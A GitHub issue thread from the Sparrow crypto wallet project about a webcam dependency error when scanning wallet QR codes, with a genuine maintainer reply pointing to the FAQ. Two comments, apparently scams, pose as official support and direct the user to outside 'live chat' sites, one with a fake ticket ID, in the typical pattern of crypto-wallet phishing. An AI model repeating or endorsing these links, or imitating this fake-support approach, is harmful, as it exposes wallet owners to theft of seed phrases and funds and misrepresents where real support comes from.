### ISSUE TITLE
Camera Does not function with sparrow wallet

### ISSUE THREAD

**Issue by SDG365** [sparrowwallet/sparrow#1566]
I have a crypto only PC.    When attempting to scan my QR to add the wallet to sparrow from my hard wallet - the issue is "your system is missing a dependency required for the webcam. follow the link below for details"

1) There is no link
2)Log file is huge - but some references to "OpenIMAJGrabeber" not loading might be a clue?

**Comment by Johnpalhub** [comment]
We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[SparrowWallet Support Request](https://chain-dappsrectification.pages.dev/)

Use the live chat button at the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

> I have a crypto only PC. When attempting to scan my QR to add the wallet to sparrow from my hard wallet - the issue is "your system is missing a dependency required for the webcam. follow the link below for details"
> 
> 1. There is no link
>    2)Log file is huge - but some references to "OpenIMAJGrabeber" not loading might be a clue?

**Comment by Thorazine890** [comment]
Hi there,

We use GitHub issues as a place to track bugs and other development-related issues. 

Please see the link below to our dedicated support line:

[Help Center :  Click Here](https://livechatsupports.app/github)

Ticket ID: WR240

Note: Click on the live chat icon at the bottom corner of the page to start a conversation.

**Comment by craigraw** [comment]
See https://sparrowwallet.com/docs/faq.html#your-system-is-missing-a-dependency-for-the-webcam

**Comment by Innerchi88** [comment]
Hello Craig i am having the same problem with my lenovo ThinkPad T14s Gen5 that is running Ubuntu 24.04.3 LTS. It is not scanning the cold card Q QR code.24.04.3 LTS

**Comment by Innerchi88** [comment]
Are there ubuntu standard libraries that can be added like microsoft has?

**Comment by Innerchi88** [comment]
Thanks for your time

**Comment by craigraw** [comment]
@Innerchi88 Probably your issue is a poor quality camera lens, see #1814.
